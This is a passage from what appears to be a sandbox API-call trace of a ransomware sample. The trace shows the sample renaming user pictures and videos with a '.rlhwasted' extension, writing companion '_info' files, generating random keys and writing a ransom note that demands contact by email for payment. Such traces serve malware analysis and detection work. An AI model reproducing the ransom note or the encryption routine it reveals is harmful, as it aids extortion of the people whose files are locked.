(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VvYGyUs\\_sPYlooxTBwyz7_k.jpg.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vvygyus\\_spylooxtbwyz7_k.jpg.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0196.799] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0196.799] GetFileSize (in: hFile=0x108, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x17731 [0196.799] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17731) returned 0xb00000 [0196.799] CloseHandle (hObject=0x108) returned 1 [0196.807] UnmapViewOfFile (lpBaseAddress=0xb00000) returned 1 [0196.807] CloseHandle (hObject=0x128) returned 1 [0196.808] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0196.808] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f6f10) returned 1 [0196.808] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0196.808] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.808] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0196.809] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0196.809] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0196.817] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8978 [0196.818] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0196.818] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0196.818] _snwprintf (in: _Dest=0x703f50, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]LInwBj0kccvXRcvs1O8mr9Hss3tKt2+CFnt6NAvbE677zmFZcmpAh7L7uyQweo3W\r\nKUebWYMWciPf/bp2VcfV8IM3tSt3laIg37fLz33TDnhOIbooFK+XkRdg0znP4QKj\r\nX+DKfXgEcXSi8ytqSYW+v5iuZ+EUiNATwaTocCItmucyJr4YEJSz4X1jv3OqNmOt\r\nnZEjgxMQA7B7VcMmADYtnjOEEPoUoVcJVnLArdjtTWd1jJu+PzOtUeC+GQ5sOD98\r\nl9vVh507UHdocm0eTQh0wU+slus+NMrEFT0Dgh2V5kQD8PYw+Yv3GJQO4gX6V5Fc\r\nQtY/GTctxs7q/2T5hlFdTsEd5d9oYXDqKBVUz/Z4vK7bR0QPYk/x6QEDeAm1JUbl\r\noV87NYxHeqIgCl6X53ZF3n3ghJwUaWFCuZkwl/9iR4QnWuqDQz2lXm5kKXhgr4ce\r\nJB7zyWVBQkz043lz4CYGFkyOvI3EZiKzSYCpoF/9EhfTpmMzTXRIHLGvShFxFER6\r\nz3XUqgQqBndjH4gXN+srbfAEHtRWR3PtlxdzUDauL2fsr1EzYb/BaXk//GOnYei/\r\nGbBM1SNRMGfPDcXgU4+Rl/zWk3L06I9Cuvzl6V8azFlI62+TWzhcRKtIbldTtKlV\r\nLn7gNCDl8g3jD3OxqlD7N2YMJrDcMZFBTfGmExTqPIX=[end_key]\r\nKEEP IT\r\n") returned 981 [0196.818] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0196.818] WriteFile (in: hFile=0x104, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0196.818] SetEndOfFile (hFile=0x104) returned 1 [0196.821] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0196.821] CloseHandle (hObject=0x104) returned 1 [0196.822] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0196.823] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70b2a0 | out: hHeap=0x6b0000) returned 1 [0196.823] _aulldvrm () returned 0x0 [0196.823] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0196.824] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0196.824] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0196.824] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms") returned 63 [0196.824] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x288) returned 0x6e7988 [0196.824] lstrcpyW (in: lpString1=0x6e7a06, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0196.824] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0196.824] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0196.824] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0196.824] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0196.825] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0196.826] WriteFile (in: hFile=0x104, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0196.827] SetEndOfFile (hFile=0x104) returned 1 [0196.827] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.827] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0196.827] lstrcpyW (in: lpString1=0x6e7a06, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0196.827] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms.rlhwasted")) returned 1 [0196.828] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0196.828] GetLastError () returned 0x5 [0196.828] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms.rlhwasted")) returned 0x23 [0196.828] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.rlhwasted", dwFileAttributes=0x22) returned 1 [0196.829] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0196.829] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0196.829] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0xf8 [0196.829] MapViewOfFile (hFileMappingObject=0x108, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf8) returned 0x6a0000 [0196.829] CloseHandle (hObject=0x128) returned 1 [0196.886] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0196.886] CloseHandle (hObject=0x108) returned 1 [0196.886] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.rlhwasted", dwFileAttributes=0x23) returned 1 [0196.887] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0196.887] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f6f10) returned 1 [0196.888] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0196.888] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.888] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f6f10) returned 1 [0196.888] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0196.888] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.897] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8978 [0196.897] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0196.897] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x715c88 [0196.897] _snwprintf (in: _Dest=0x715c88, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]HlnU3ahskWYG+sE2Ff2D+q/VS2gLxDNuvgYfhHJjysAI7+7HyhwAq/T+lU1gubww\r\nUMjjlWMp+rEJpLEYPHX1zgJSwXs4OE6smhkO8HY/JyNvz406Dq0IvzQRyZduy+Qx\r\nk91l6YcpfhHMcu3TQvB6xHURmf2q5guBbTV5vo3/oJ9tEpt68jO9KcFouagxYa42\r\nFrgwQnIqUYUH10wYkDtAw528z8xutKg24g3VXl2Or9thGscecp0Z9nlt5WzxPK6q\r\nVzGStu372Kt97j68ckFnSruiBS7UC7nzcKBe89T6S5Xv2ExHdRpLkiGjQ4bNPbFm\r\nOT1UM5kjS+3arFTWtV8Vm/GET+0sBzBbLxXwWWAtpOiHUCQ1uOLB4Fo/cUf0g1Q5\r\ncfvrwtHV7o0m7u+w1PRQiBP5r2SU1GHsVHF66ZtotdpifZVROqferjCsf5u4/TGb\r\n7LtOK57xPvDETLf1CSLCgWzjvB+P4RLH5c9NmSetS/TkFm3BgGNF2WeJyeYeWDdG\r\nP2cM56Hez14ppkVkufr/ndKlEkw0nB7d8gvqd/bbIDx7l472u+fz5pIUQCzY8WqT\r\ndhY0M8blHm4PcdqFvsRvVftWYx4OWX3Tu7g+UlbvS8vTZBBMSUJW1c2ukjQE3eEc\r\nFW9JS0RJfydGEYjnCiB2cLFUSR5n7qKSmFTuoNIMMrg=[end_key]\r\nKEEP IT\r\n") returned 981 [0196.897] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0196.897] WriteFile (in: hFile=0x104, lpBuffer=0x715c88*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x715c88*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0196.898] SetEndOfFile (hFile=0x104) returned 1 [0196.900] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715c88 | out: hHeap=0x6b0000) returned 1 [0196.900] CloseHandle (hObject=0x104) returned 1 [0196.904] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0196.905] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6f9bc0 | out: hHeap=0x6b0000) returned 1 [0196.905] _aulldvrm () returned 0x0 [0196.905] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f6f10) returned 1 [0196.906] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0196.906] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.906] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Gpun dCJ fuTRp38Be4\\n0EUxqqli.mp4") returned 74 [0196.906] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x29e) returned 0x6e7988 [0196.906] lstrcpyW (in: lpString1=0x6e7a1c, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0196.906] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x715c88 [0196.906] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0196.909] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x715c88 | out: pbBuffer=0x715c88) returned 1 [0196.909] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0196.909] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Gpun dCJ fuTRp38Be4\\n0EUxqqli.mp4.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\gpun dcj futrp38be4\\n0euxqqli.mp4.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0196.938] WriteFile (in: hFile=0x104, lpBuffer=0x715c88*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x715c88*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0196.939] SetEndOfFile (hFile=0x104) returned 1 [0196.939] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.939] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715c88 | out: hHeap=0x6b0000) returned 1 [0196.939] lstrcpyW (in: lpString1=0x6e7a1c, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0196.939] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Gpun dCJ fuTRp38Be4\\n0EUxqqli.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\gpun dcj futrp38be4\\n0euxqqli.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Gpun dCJ fuTRp38Be4\\n0EUxqqli.mp4.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\gpun dcj futrp38be4\\n0euxqqli.mp4.rlhwasted")) returned 1 [0196.940] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Gpun dCJ fuTRp38Be4\\n0EUxqqli.mp4.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\gpun dcj futrp38be4\\n0euxqqli.mp4.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0196.940] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0196.941] GetFileSize (in: hFile=0x108, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0xdec7 [0196.941] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xdec7) returned 0x6a0000 [0196.941] CloseHandle (hObject=0x108) returned 1 [0196.946] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0196.947] CloseHandle (hObject=0x128) returned 1 [0196.947] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0196.947] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f10) returned 1 [0196.948] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0196.948] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0196.948] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0196.949] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0196.949] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0196.958] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8978 [0196.958] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0196.958] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x715c88 [0196.958] _snwprintf (in: _Dest=0x715c88, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]JpEm8Ed305SENKoEN2GKSTCuHiu+UGrgW1sKz5b5km5kzY+qo6qjBYcwjOm2vVC+\r\nTFLtVi7WJQvjO0YqWwnS29YUjbvIeILCAjjhsCouuGDEBgPpi7WB+Jb0w7Xz98RF\r\naiKICIsROtXxri3DH/3mRLGiwiahhDzJGKMB2tfILaBfYTW16Dy/YYS2JLInc8Y/\r\nhtEiHGTip6bL2OacMkLXDAKaxoJyvQsdfJy12p+0FwVVre3XSY4BSCgAlVoijpEa\r\n7TU+EP2x+4DyLSj9EV6Z23XkZHmfFJ1zvUPoljVzFbZ3Ll7WQKesQSonCKncmcfD\r\nyg4cwiQsrymOEXllXuH8FlfIgOUoUNiLdTfA1FAwibwBbRlYHE380uLLlWesl2la\r\nnRIzSAYxzsEHZ2XX/XF8Sm9MF8eoLcjc9pNxBFZ44i4yg0ETTyICwKzTvztjE9cm\r\n2SZSYB3WNNZ1TOK2XCNDZ/o4Osn9c+GqfVcmI3RDe2t76fl30Rg1gLCMlhagPj4B\r\nwuactSzFIPxT09m6AMIZbzipxvqo2nLTFctICdmWAHqNbUX8TtoCJiUP18KOk/7P\r\ngQOf8R8KADcGuLaVONlx597BYpP9JCjjSKP1QMpBZMZSwuO6Z/+VhLCD+xlErOgw\r\n/fYhhw+ePIxnM8A6705M11Yr9ZgHwthmWt9pZPJwe8d=[end_key]\r\nKEEP IT\r\n") returned 981 [0196.958] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0196.958] WriteFile (in: hFile=0x104, lpBuffer=0x715c88*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x715c88*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0196.958] SetEndOfFile (hFile=0x104) returned 1 [0196.960] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715c88 | out: hHeap=0x6b0000) returned 1 [0196.960] CloseHandle (hObject=0x104) returned 1 [0196.962] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0196.963] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x708040 | out: hHeap=0x6b0000) returned 1 [0196.963] _aulldvrm () returned 0x0 [0196.963] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0196.964] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0196.964] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0196.964] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\I_nAi8fonH9F_i7d6ED.mp4") returned 64 [0196.964] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x28a) returned 0x6e7988 [0196.964] lstrcpyW (in: lpString1=0x6e7a08, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0196.964] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x715c88 [0196.964] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0196.965] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x715c88 | out: pbBuffer=0x715c88) returned 1 [0196.965] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0196.965] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\I_nAi8fonH9F_i7d6ED.mp4.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\i_nai8fonh9f_i7d6ed.mp4.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0196.966] WriteFile (in: hFile=0x104, lpBuffer=0x715c88*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x715c88*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0196.967] SetEndOfFile (hFile=0x104) returned 1 [0196.967] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.967] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715c88 | out: hHeap=0x6b0000) returned 1 [0196.967] lstrcpyW (in: lpString1=0x6e7a08, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0196.967] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\I_nAi8fonH9F_i7d6ED.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\i_nai8fonh9f_i7d6ed.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\I_nAi8fonH9F_i7d6ED.mp4.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\i_nai8fonh9f_i7d6ed.mp4.rlhwasted")) returned 1 [0196.968] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\I_nAi8fonH9F_i7d6ED.mp4.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\i_nai8fonh9f_i7d6ed.mp4.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0196.969] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0196.969] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x18669 [0196.969] MapViewOfFile (hFileMappingObject=0x108, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18669) returned 0xb00000 [0196.969] 